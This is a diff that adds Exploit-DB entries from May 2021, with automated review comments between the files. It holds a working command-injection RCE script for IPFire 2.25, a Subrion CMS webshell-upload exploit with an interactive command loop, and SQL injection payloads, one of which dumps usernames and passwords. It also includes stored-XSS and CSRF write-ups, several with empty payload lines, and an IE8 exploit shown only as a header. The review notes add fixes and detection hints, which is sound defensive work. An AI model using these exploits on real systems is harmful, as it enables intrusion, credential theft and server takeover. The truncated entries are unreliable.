diff --git a/exploits/cgi/webapps/49869.py b/exploits/cgi/webapps/49869.py
new file mode 100755
index 000000000..88330180d
--- /dev/null
+++ b/exploits/cgi/webapps/49869.py
@@ -0,0 +1,46 @@
+# Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated)
+# Date: 15/05/2021
+# Exploit Author: Mücahit Saratar
+# Vendor Homepage: https://www.ipfire.org/
+# Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso
+# Version: 2.25 - core update 156
+# Tested on: parrot os 5.7.0-2parrot2-amd64
+
+#!/usr/bin/python3
+
+import requests as R
+import sys
+import base64
+
+try:
+ host = sys.argv[1]
+ assert host[:4] == "http" and host[-1] != "/"
+ url = host + "/cgi-bin/pakfire.cgi"
+ username = sys.argv[2]
+ password = sys.argv[3]
+ komut = sys.argv[4]
+except:
+ print(f"{sys.argv[0]} http://target.com:444 username password command")
+ exit(1)
+
+veri = {
+ "INSPAKS": f"7zip;{komut}",
+ "ACTION":"install",
+ "x": "10",
+ "y": "6" }
+token = b"Basic " + base64.b64encode(f"{username}:{password}".encode())
+header = {"Authorization": token,
+ "Connection": "close",
+ "Cache-Control": "max-age=0",
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36",
+ "Origin": host,
+ "Sec-GPC": "1",
+ "Sec-Fetch-Site": "same-origin",
+ "Sec-Fetch-Mode": "navigate",
+ "Sec-Fetch-User": "?1",
+ "Sec-Fetch-Dest": "document",
+ "Referer": host}
+
+
+R.post(url, data=veri, headers=header, verify=False)
+print("Done.")
\ No newline at end of file
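Review bot: The interpreter line `#!/usr/bin/python3` is on line 9 of the new file, below the header comments, so it is an ordinary comment and the 100755 mode cannot use it; it belongs on line 1, above `# Exploit Title`. `R.post(url, data=veri, headers=header, verify=False)` sends the Basic credentials with certificate checking switched off, which deserves a comment such as `# verify=False: certificate is not checked, so the credentials are readable by any on-path host`. For defenders, the header should also state that the injection point is the `INSPAKS` field of a POST to `/cgi-bin/pakfire.cgi`, so a `;` or other shell metacharacter in that field is what to log and reject.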
diff --git a/exploits/php/webapps/45161.py b/exploits/php/webapps/45161.py
index 1a345bb11..5bb055b37 100755
--- a/exploits/php/webapps/45161.py
+++ b/exploits/php/webapps/45161.py
@@ -1,4 +1,4 @@
-# Title: OpenEMR < 5.0.1 - Remote Code Execution
+# Title: OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated)
# Author: Cody Zacharias
# Date: 2018-08-07
# Vendor Homepage: https://www.open-emr.org/
diff --git a/exploits/php/webapps/49868.txt b/exploits/php/webapps/49868.txt
new file mode 100644
index 000000000..29899a8fb
--- /dev/null
+++ b/exploits/php/webapps/49868.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Customer Relationship Management (CRM) System 1.0 - 'Category' Persistent Cross site Scripting
+# Date: 14-05-2021
+# Exploit Author: Vani K G
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
+# Version: 1.0
+# Tested on: Windows 10/XAMPP
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the
+two. It occurs when a malicious script is injected directly into a
+vulnerable web application.
+
+Attack Vector :
+
+This vulnerability can result in the attacker to inject the XSS
+payload in the Title field of the page and each time any user will
+open the website, the XSS triggers and attacker can able to steal the
+cookie according to the crafted payload.
+
+Vulnerable Parameters: Category input field.
+
+Payload :
+
+Vulnerable URL :
+http://localhost/crm/admin/?page=services&view=category
+
+Steps To Reproduce :
+1) Go to the admin Dashboard
+2) Click on Category and click Add New button.
+3) Put Payload into the 'Category' input field.
+4) Click on Save.
+5) XSS payload will be triggered.
\ No newline at end of file
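Review bot: The entry contradicts itself about the injection point: the title and `Vulnerable Parameters` name the Category input field, while the `Attack Vector` paragraph says the payload goes in the Title field. The `Payload :` line is also empty as shown here, so the report cannot be triaged from this file alone; the same gap appears in 49870.txt (step 2), 49871.txt (the form under `# Exploit:`), 49873.txt and 49875.txt (`s_emotion=`). 49873.txt reuses the same `Attack Vector` paragraph, and its title says 'Category' although its steps name the System name field. I would add a closing line such as `Fix: HTML-encode the category name on output and validate it on save.`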
diff --git a/exploits/php/webapps/49870.txt b/exploits/php/webapps/49870.txt
new file mode 100644
index 000000000..1c174253d
--- /dev/null
+++ b/exploits/php/webapps/49870.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - 'Firstname' Persistent Cross Site Scripting (Authenticated)
+# Date: 14-05-2021
+# Exploit Author: Reza Afsahi
+# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
+# Version: 1.0
+# Tested on: Linux parrot
+
+# --- Description --- #
+
+# The web application allows member to inject persistent Cross-Site-Scripting payload which will be executed in both member and Admin panel
+
+# --- Proof of concept --- #
+
+1- Create account and login as member and go to: http://localhost/APR/edit_info.php
+2- Inject this payload into Firstname input :
+4- and fill other inputs as you want (Other inputs might be vulnerable as well) then click on Update button.
+5- refresh the page and Xss popup will be triggered.
+
+6- Now if Admin visit this page in his/her Dashboard : http://localhost/APR/admin/members.php
+7- Our Xss payload will be executed on Admin Browser
+
+** Attacker can use this vulnerability to take over Admin account **
\ No newline at end of file
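Review bot: The steps jump from 2 to 4, so a reader cannot tell whether a step is missing or only misnumbered. The description should also say where the value is printed without encoding: per steps 5 to 7 that is both `edit_info.php` and `admin/members.php`, which means member-supplied data reaches the admin's browser. A remediation line such as `Fix: encode Firstname (and the other profile fields) with htmlspecialchars() wherever they are printed` would make the entry actionable.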
diff --git a/exploits/php/webapps/49871.txt b/exploits/php/webapps/49871.txt
new file mode 100644
index 000000000..fe2420eeb
--- /dev/null
+++ b/exploits/php/webapps/49871.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Cross Site Request Forgery (Add Admin)
+# Date: 15-05-2021
+# Exploit Author: Reza Afsahi
+# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
+# Version: 1.0
+# Tested on: PHP 7.4.11 , Linux x64_x86
+
+
+# --- Proof of concept --- #
+
+# Vulnerable file : http://localhost/APR/admin/user.php
+
+# Exploit:
+
+
+
+ Add Admin
+
+
+ Absolutely Not Vulnerable Site :D
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/49873.txt b/exploits/php/webapps/49873.txt
new file mode 100644
index 000000000..b4ac9b7c0
--- /dev/null
+++ b/exploits/php/webapps/49873.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Simple Chatbot Application 1.0 - 'Category' Stored Cross site Scripting
+# Date: 16-05-2021
+# Exploit Author: Vani K G
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html
+# Version: 1.0
+# Tested on: Windows 10/XAMPP
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the
+two. It occurs when a malicious script is injected directly into a
+vulnerable web application.
+
+Attack Vector :
+
+This vulnerability can result in the attacker to inject the XSS
+payload in the Title field of the page and each time any user will
+open the website, the XSS triggers and attacker can able to steal the
+cookie according to the crafted payload.
+
+Vulnerable Parameters: Settings System Info field
+Payload :
+
+Vulnerable URL :
+http://localhost/chatbot/admin/?page=system_info
+
+Steps To Reproduce :
+1) Go to the admin Dashboard
+2) Click on Settings and Select System Info.
+3) Put Payload into the System name input field.
+4) Click on Save.
+5) XSS payload will be triggered.
\ No newline at end of file
diff --git a/exploits/php/webapps/49874.txt b/exploits/php/webapps/49874.txt
new file mode 100644
index 000000000..d58225f4f
--- /dev/null
+++ b/exploits/php/webapps/49874.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Billing Management System 2.0 - Union based SQL injection (Authenticated)
+# Date: 2021-05-16
+# Exploit Author: Mohammad Koochaki
+# Vendor Homepage: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14380&title=Billing+Management+System+in+PHP%2FMySQLi+with+Source+Code
+# Version: 2.0
+
+# This web application contains several SQL injection vulnerabilities in the following paths:
+ - http://localhost/editgroup.php?id=1
+ - http://localhost/edituser.php?id=1
+ - http://localhost/editcategory.php?id=10
+ - http://localhost/editproduct.php?id=1
+ - http://localhost/editsales.php?id=1
+
+# PoC (editgroup.php):
+
+- Vulnerable code:
+ $sql="SELECT * from user_groups where delete_status='0' and
+id='".$_GET['id']." '";
+
+- Payload:
+
+http://localhost/editgroup.php?id=-1%27%20union%20select%201,group_concat(username,0x3a,password),3,4,5%20from%20users--+
\ No newline at end of file
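Review bot: The quoted query shows the root cause, `$_GET['id']` concatenated straight into the SQL string, but the entry stops short of naming the fix. I would add `# Fix: use a prepared statement with id=? and bind the value as an integer` under the `Vulnerable code` block. It should also say that the four other listed pages (`edituser.php`, `editcategory.php`, `editproduct.php`, `editsales.php`) need the same change, presumably because they build their queries the same way. The payload reads `username` and `password` from `users`; whether those passwords are stored hashed is not visible here and is worth a sentence.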
diff --git a/exploits/php/webapps/49875.txt b/exploits/php/webapps/49875.txt
new file mode 100644
index 000000000..712752466
--- /dev/null
+++ b/exploits/php/webapps/49875.txt
@@ -0,0 +1,59 @@
+# Exploit Title: Advanced Guestbook 2.4.4 - 'Smilies' Persistent Cross-Site Scripting (XSS)
+# Date: 17/08/2021
+# Exploit Author: Abdulkadir AYDOGAN
+# Vendor Homepage: https://www.ampps.com/apps/guestbooks/Advanced_Guestbook
+# Software Link: https://www.ampps.com/apps/guestbooks/Advanced_Guestbook
+# Version: 2.4.4
+
+Advanced Guestbook is a free open source guestbook script developed in PHP.
+Examples of features include email notifications, uploading pictures, html
+tags handling, multiple polls, comments and themes.
+
+#Description
+The following is PoC to use the XSS bug with authorized user.
+
+Firstly there are four part of a emotion object which is :
+
+- Emotion icon
+- Emotion file name
+- Emotion command which will be used to call this object (s_code)
+- Emotion description (s_emotion)
+
+Here is the exploitation steps for vulnerability:
+
+1. Login to your admin account.
+2. Go to "Smilies" tab to view and edit emotion icons
+3. Click "edit" text in the "Action" column to edit emotions
+4. Change emotion description to Javascript code
+5. Click the "Submit Settings"
+6. Click "Smilies" tab again to view all emotions and Javascript code will
+be executed
+
+# Vulnerable Parameter Type: POST
+# Vulnerable Parameter: s_emotion
+# Attack Pattern:
+
+#PoC
+HTTP Request:
+
+POST /advancedguestbook/admin.php HTTP/1.1
+Host: HOST_ADDRESS
+Content-Length: 175
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://HOST_ADDRESS
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer:
+http://HOST_ADDRESS/advancedguestbook/admin.php?action=smilies&session=17395de9919fffa0ac9476370c2c7ba0&uid=1&edit_smilie=7
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+Cookie: _ga=GA1.2.2068746825.1621203842; _gid=GA1.2.1432458757.1621203842;
+_gat=1
+Connection: close
+
+s_code=:cool:&s_emotion=&edit_smilie=7&uid=1&session=17395de9919fffa0ac9476370c2c7ba0&action=smilies&add_smilies=1
\ No newline at end of file
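Review bot: The captured request still carries what looks like the author's own `session=17395de9919fffa0ac9476370c2c7ba0` value (in both the Referer and the body) and Google Analytics cookies; these should be replaced with placeholders such as `SESSION_ID`, as was done for `HOST_ADDRESS`. The `# Date: 17/08/2021` header looks like a typo for 17/05/2021, since the neighbouring entries are dated mid-May 2021. `Content-Length: 175` also does not match the body as shown, where `s_emotion=` is empty. A one-line fix note, e.g. `Fix: HTML-encode s_emotion when the Smilies list is rendered`, would help.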
diff --git a/exploits/php/webapps/49876.py b/exploits/php/webapps/49876.py
new file mode 100755
index 000000000..c41f72df9
--- /dev/null
+++ b/exploits/php/webapps/49876.py
@@ -0,0 +1,120 @@
+# Exploit Title: Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated)
+# Date: 17/05/2021
+# Exploit Author: Fellipe Oliveira
+# Vendor Homepage: https://subrion.org/
+# Software Link: https://github.com/intelliants/subrion
+# Version: SubrionCMS 4.2.1
+# Tested on: Debian9, Debian 10 and Ubuntu 16.04
+# CVE: CVE-2018-19422
+# Exploit Requirements: BeautifulSoup library
+# https://github.com/intelliants/subrion/issues/801
+
+#!/usr/bin/python3
+
+import requests
+import time
+import optparse
+import random
+import string
+from bs4 import BeautifulSoup
+
+parser = optparse.OptionParser()
+parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri http://target/panel")
+parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")
+parser.add_option('-p', '--passw', action="store", dest="passw", help="Password credential to login")
+
+options, args = parser.parse_args()
+
+if not options.url:
+ print('[+] Specify an url target')
+ print('[+] Example usage: exploit.py -u http://target-uri/panel')
+ print('[+] Example help usage: exploit.py -h')
+ exit()
+
+url_login = options.url
+url_upload = options.url + 'uploads/read.json'
+url_shell = options.url + 'uploads/'
+username = options.user
+password = options.passw
+
+session = requests.Session()
+
+def login():
+ global csrfToken
+ print('[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 \n')
+ print('[+] Trying to connect to: ' + url_login)
+ try:
+ get_token_request = session.get(url_login)
+ soup = BeautifulSoup(get_token_request.text, 'html.parser')
+ csrfToken = soup.find('input',attrs = {'name':'__st'})['value']
+ print('[+] Success!')
+ time.sleep(1)
+
+ if csrfToken:
+ print(f"[+] Got CSRF token: {csrfToken}")
+ print("[+] Trying to log in...")
+
+ auth_url = url_login
+ auth_cookies = {"loader": "loaded"}
+ auth_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/", "Upgrade-Insecure-Requests": "1"}
+ auth_data = {"__st": csrfToken, "username": username, "password": password}
+ auth = session.post(auth_url, headers=auth_headers, cookies=auth_cookies, data=auth_data)
+
+ if len(auth.text) <= 7000:
+ print('\n[x] Login failed... Check credentials')
+ exit()
+ else:
+ print('[+] Login Successful!\n')
+ else:
+ print('[x] Failed to got CSRF token')
+ exit()
+
+ except requests.exceptions.ConnectionError as err:
+ print('\n[x] Failed to Connect in: '+url_login+' ')
+ print('[x] This host seems to be Down')
+ exit()
+
+ return csrfToken
+
+def name_rnd():
+ global shell_name
+ print('[+] Generating random name for Webshell...')
+ shell_name = ''.join((random.choice(string.ascii_lowercase) for x in range(15)))
+ time.sleep(1)
+ print('[+] Generated webshell name: '+shell_name+'\n')
+
+ return shell_name
+
+def shell_upload():
+ print('[+] Trying to Upload Webshell..')
+ try:
+ up_url = url_upload
+ up_cookies = {"INTELLI_06c8042c3d": "15ajqmku31n5e893djc8k8g7a0", "loader": "loaded"}
+ up_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------6159367931540763043609390275", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/uploads/"}
+ up_data = "-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n17978446266285\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"__st\"\r\n\r\n"+csrfToken+"\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\""+shell_name+".phar\"\r\nContent-Type: application/octet-stream\r\n\r\n\n\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n1621210391\r\n-----------------------------6159367931540763043609390275--\r\n"
+ session.post(up_url, headers=up_headers, cookies=up_cookies, data=up_data)
+
+ except requests.exceptions.HTTPError as conn:
+ print('[x] Failed to Upload Webshell in: '+url_upload+' ')
+ exit()
+
+def code_exec():
+ try:
+ url_clean = url_shell.replace('/panel', '')
+ req = session.get(url_clean + shell_name + '.phar?cmd=id')
+
+ if req.status_code == 200:
+ print('[+] Upload Success... Webshell path: ' + url_shell + shell_name + '.phar \n')
+ while True:
+ cmd = input('$ ')
+ x = session.get(url_clean + shell_name + '.phar?cmd='+cmd+'')
+ print(x.text)
+ else:
+ print('\n[x] Webshell not found... upload seems to have failed')
+ except:
+ print('\n[x] Failed to execute PHP code...')
+
+login()
+name_rnd()
+shell_upload()
+code_exec()
\ No newline at end of file
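Review bot: Nothing in `code_exec()` or after it removes the uploaded `.phar`, so an authorised test leaves behind a file that answers `?cmd=` to anyone who learns its name; the script should at least print a reminder to delete `uploads/<shell_name>.phar` when the loop ends. The request dictionaries also keep lab artefacts, `"Origin": "http://192.168.1.20"`, the matching Referer and a fixed `INTELLI_06c8042c3d` cookie, which ought to be called out in a comment as values from the author's test host. The `#!/usr/bin/python3` line in this file (and likewise in 49869.py) comes after the header comments and is not a real shebang. For detection, the header could note what to look for in web logs: a POST to `uploads/read.json` with a `.phar` filename, then GETs to `/uploads/` with a 15-letter lowercase name and a `cmd` parameter.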
diff --git a/exploits/php/webapps/49877.txt b/exploits/php/webapps/49877.txt
new file mode 100644
index 000000000..b02c89409
--- /dev/null
+++ b/exploits/php/webapps/49877.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Printable Staff ID Card Creator System 1.0 - SQLi & RCE via Arbitrary File Upload
+# Date: 2021-05-16
+# Exploit Author : bwnz
+# Software Link: https://www.sourcecodester.com/php/12802/php-staff-id-card-creation-and-printing-system.html
+# Version: 1.0
+# Tested on: Ubuntu 20.04.2 LTS
+
+# Printable Staff ID Card Creator System is vulnerable to an unauthenticated SQL Injection attack.
+# After compromising the database via SQLi, an attacker can log in and leverage an arbitrary file upload
+# vulnerability to obtain remote code execution.
+
+
+-----SQL Injection-----
+Step 1.) Navigate to the login page and populate the email and password fields.
+Step 2.) With Burp Suite running, send and capture the request.
+Step 3.) Within Burp Suite, right click and "Save item" in preparation for putting the request through SQLMap.
+Step 4.) Open a terminal and run the following command:
+ sqlmap -r
+
+Below are the SQLMap results
+
+Parameter: user_email (POST)
+ Type: boolean-based blind
+ Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+ Payload: user_email=test@test.com' RLIKE (SELECT (CASE WHEN (9007=9007) THEN 0x7465737440746573742e636f6d ELSE 0x28 END))-- JaaE&password=`&login_button=
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: user_email=test@test.com' AND (SELECT 7267 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(7267=7267,1))),0x7162716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pCej&password=`&login_button=
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: user_email=test@test.com' AND (SELECT 2884 FROM (SELECT(SLEEP(5)))KezZ)-- bBqz&password=`&login_button=
+----- END -----
+
+
+----- Authenticated RCE via Arbitrary File Upload -----
+# For this attack, it is assumed that you've obtained credentials via the SQL Injection attack above and have logged in.
+
+Step 1.) After logging in, click the "Initialization" option and "Add System Info".
+Step 2.) Populate the blank form with arbitrary data. At the bottom of the form, there is an option to upload a logo. Upload your evil.php file here and click "Finish".
+Step 3.) By default, the file is uploaded to http:///Staff_registration/media/evil.php. Navigate to it for RCE.
+----- END ------
\ No newline at end of file
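Review bot: Two placeholders appear to have been lost from the steps: `sqlmap -r` has no request-file argument and the upload path reads `http:///Staff_registration/media/evil.php` with no host; writing them as `REQUEST_FILE` and `HOST` would survive rendering. The entry names two separate flaws but gives no fix for either. I would add `Fix: bind user_email as a query parameter in the login handler` after the SQLMap results and `Fix: accept only image types for the logo and stop PHP from executing under media/` after the upload steps.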
diff --git a/exploits/windows/local/49872.js b/exploits/windows/local/49872.js
new file mode 100644
index 000000000..f8d99558c
--- /dev/null
+++ b/exploits/windows/local/49872.js
@@ -0,0 +1,168 @@
+# Exploit Title: Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free
+# Date: 15/05/2021
+# CVE : CVE-2013-3893
+# PoC: https://github.com/travelworld/cve_2013_3893_trigger.html/blob/gh-pages/params.json
+# Exploit Author: SlidingWindow
+# Vendor Advisory: https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2013/2887505?redirectedfrom=MSDN
+# Tested on: Microsoft Internet Explorer 8 (version: 8.0.7601.17514) on Windows 7 SP1 (Version 6.1 Build 7601 SP1)
+# Bypasses: DEP, ASLR using MSVCR71.DLL
+# Thanks to @corelanc0d3r for awesome Heap Exploitation Training and @offsectraining for OSCP training
+
+
+
+
+
+